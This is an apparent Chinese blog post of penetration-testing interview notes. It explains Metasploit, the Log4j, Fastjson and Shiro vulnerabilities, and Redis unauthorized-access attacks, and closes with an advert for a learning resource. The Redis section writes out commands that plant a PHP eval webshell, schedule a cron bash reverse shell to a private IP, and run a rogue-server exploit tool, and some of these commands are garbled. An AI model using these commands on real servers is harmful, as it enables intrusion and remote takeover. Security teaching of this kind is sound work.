然后就是使用PowersSploit(基于Powershell的后渗透框架软件包括了很多Power shell攻击脚本主要用于渗透中的信息收集权限提升权限维持)的时候在Powshell上使用过一些下载和运行攻击脚本的命令。MSF是什么知道怎么使用吗简介Metasploit Framework(MSF)是一款开源安全漏洞检测工具附带数千个已知的软件漏洞并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程。模块Auxiliary辅助模块 为渗透测试信息搜集提供了大量的辅助模块支持 Exploits攻击模块 利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击从而获得对远程目标系统访问权的代码组件。 Payload攻击载荷模块 攻击成功后促使靶机运行的一段植入代码 Post 后渗透攻击模块 收集更多信息或进一步访问被利用的目标系统 Encoders编码模块 将攻击载荷进行编码来绕过防护软件拦截使用首先利用Auxiliary辅助探测模块扫描嗅探指纹识别相关漏洞然后确认漏洞存在使用Exploit漏洞利用模块对漏洞进行利用包括设置payload攻击载荷设置本机监听等等。漏洞利用成功目标主机就会通过设置的端口主动连接产生会话。进而可以进行后渗透。功能木马免杀抓取用户密码关闭杀毒软件屏幕截图新建账号远程登录迁移进程提权操作网络嗅探端口转发 内网代理内网扫描生成后门清除日志等等。常见的框架漏洞log4j**远程代码执行漏洞**原理Log4j 是Apache 的一个开源项目是一款基于Java 的开源日志记录工具。该漏洞主要是由于日志在打印时当遇到${后以:号作为分割将表达式内容分割成两部分前面一部分prefix后面部分作为key然后通过prefix去找对应的lookup通过对应的lookup实例调用lookup方法最后将key作为参数带入执行引发远程代码执行漏洞。 具体操作在正常的log处理过程中对**${**这两个紧邻的字符做了检测一旦匹配到类似于表达式结构的字符串就会触发替换机制将表达式的内容替换为表达式解析后的内容而不是表达式本身从而导致攻击者构造符合要求的表达式供系统执行Fastjson反序列化漏洞判断正常请求是get请求并且没有请求体可以通过构造错误的POST请求即可查看在返回包中是否有fastjson这个字符串来判断。原理fastjson是阿里巴巴开发的一款将json字符串和java对象进行序列化和反序列化的开源json解析库。fastjson提供了autotype功能在请求过程中我们可以在请求包中通过修改type的值来反序列化为指定的类型而fastjson在反序列化过程中会设置和获取类中的属性如果类中存在恶意方法就会导致代码执行等这类问题。无回显怎么办1.一种是直接将命令执行结果写入到静态资源文件里如html、js等然后通过http访问就可以直接看到结果 2.通过dnslog进行数据外带但如果无法执行dns请求就无法验证了 3.直接将命令执行结果回显到请求Poc的HTTP响应中Shiro**反序列化漏洞**原理Shiro是Apache下的一个开源Java安全框架执行身份认证授权密码和会话管理。shiro在用户登录时除了账号密码外还提供了可传递选项remember me。用户在登录时如果勾选了remember me选项那么在下一次登录时浏览器会携带cookie中的remember me字段发起请求就不需要重新输入用户名和密码。判断1.数据返回包中包含rememberMedeleteMe字段。2.直接发送原数据包返回的数据中不存在关键字可以通过在发送数据包的cookie中增加字段rememberMe然后查看返回数据包中是否存在关键字。shiro-550shiro反序列化漏洞利用有两个关键点首先是在shiro1.2.4时AES加密的密钥Key被硬编码在代码里只要能获取到这个key就可以构造恶意数据让shiro识别为正常数据。另外就是shiro在验证rememberMe时使用了readObject方法readObject用来执行反序列化后需要执行的代码片段从而造成恶意命令可以被执行。攻击者构造恶意代码并且序列化AES加密base64编码后作为cookie的rememberMe字段发送。Shiro将rememberMe进行编码解密并且反序列化最终造成反序列化漏洞。shiro-721 不需要key利用Padding Oracle Attack构造出RememberMe字段后段的值结合合法的Remember。了解过redis数据库和常见的漏洞吗答redis是一个非关系型数据库使用的默认端口是6379。常见的漏洞是未授权访问漏洞攻击者无需认证就可以访问内部数据。利用手段主要有1.向root权限账户写入**ssh公钥文件直接免密登录服务器。(受害者redis非root权限运行会报错)**条件服务器存在.ssh目录且具有写入的权限原理在数据库中插入一条数据将本机的公钥作为valuekey值随意然后通过修改数据库的默认路径为/root/.ssh和默认的缓冲文件authorized.keys把缓冲的数据保存在文件里这样就可以在服务器端的/root/.ssh下生成一个授权的key。2.写入webshell条件已知web绝对路径。步骤redis -cli -h 192.168.x.x 连接目标服务器config set dir “/var/www/html” 设置保存文件路径config set dbfilename shell.php 设置保存文件名set x “\n\n?php eval($\\\_POST\[cmd\]); ?\n” 将webshell写入x键值中save 保存局限1.服务器处于内网写入webshell后我们的公网IP无法连接2.服务器IP地址不固定3.6379端口不允许入方向4.上传webshell可能直接被杀毒软件删除3.反弹连接shell设置监听端口常用的工具1.msf 2.netcat 3.socat利用msf设置监听步骤use exploit/multi/handlerset payload generic/shell_reverse_tcpset lhost 192.168.x.x 默认监听端口为4444run4.定时任务反弹shell步骤定时任务用的表达式 Cron表达式是一个字符串该字符串由6个空格分为7个域每一个域代表一个时间含义。分 时 天 月 周 user-name(用户) command(命令) 比如每过一分钟向root用户的定时任务中写入反弹连接命令(1) config set dir /var/spool/cron/ //目录切换到定时任务的文件夹中(2) config set dbfilename root //设置保存文件名(3)set x “\n * * * * * bash -i /dev/tcp/192.168.96.222/7777 01\n” //将反弹shell写入x键值中(4)save //保存利用定时任务反弹shell在目标系统是**Centos上可用Ubuntu上有限制**理由如下1.默认redis写文件后是644的权限但ubuntu要求执行定时任务件/var/spool/cron/crontabs/权限必须是600也就是-rw-------才会执行否则会报错而Centos的定时任务文件权限644也能执行 2.redis保存RDB会存在乱码在Ubuntu上会报错而在Centos上不会报错 3.两个系统的定时任务文件目录不同利用主从复制getshell条件版本(4.x~5.0.5)原理数据读写体量很大时为了减轻服务器的压力redis提供了主从模式主从模式就是指定一个redis实例作为主机其余的作为从机其中主机和从机的数据是相同的而从机只负责读主机只负责写。通过读写分离可以减轻服务器端的压力。利用工具RedisRogueServer地址https://github.com/n0b0dyCN/redis-rogue-server使用工具的命令python3 redis-rogue-server.py --rhostx.x.x.x --lhostx.x.x.x --expexp.so两种使用方法交互式反弹式限制利用这个方法getshell或者rce任意导致redis服务瘫痪一般不建议使用redis未授权访问漏洞的防范措施1.添加登录密码2.修改默认端口3.关闭端口4.禁止以root用户权限启动以低权限启动redis服务文章来自网上侵权请联系博主互动话题如果你想学习更多网安方面的知识和工具可以看看以下题外话学习资源如果你是也准备转行学习网络安全黑客或者正在学习这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你知识库由360智榜样学习中心独家打造出品旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力熟练掌握基础攻防到深度对抗。1、知识库价值深度 本知识库超越常规工具手册深入剖析攻击技术的底层原理与高级防御策略并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等提供了独到的技术视角和实战验证过的对抗方案。广度 面向企业安全建设的核心场景渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点是应对复杂攻防挑战的实用指南。实战性 知识库内容源于真实攻防对抗和大型演练实践通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。2、 部分核心内容展示360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。内容组织紧密结合攻防场景辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合是你学习过程中好帮手。1、网络安全意识2、Linux操作系统3、WEB架构基础与HTTP协议4、Web渗透测试5、渗透测试案例分享6、渗透测试实战技巧7、攻防对战实战8、CTF之MISC实战讲解3、适合学习的人群‌一、基础适配人群‌‌零基础转型者‌适合计算机零基础但愿意系统学习的人群资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌‌开发/运维人员‌具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能实现职业方向拓展‌或者转行就业‌应届毕业生‌计算机相关专业学生可通过资料构建完整的网络安全知识体系缩短企业用人适应期‌‌二、能力提升适配‌1、‌技术爱好者‌适合对攻防技术有强烈兴趣希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌2、安全从业者‌帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌3、‌合规需求者‌包含等保规范、安全策略制定等内容适合需要应对合规审计的企业人员‌因篇幅有限仅展示部分资料完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】这些东西我都可以免费分享给大家需要的可以点这里自取:网安入门到进阶资源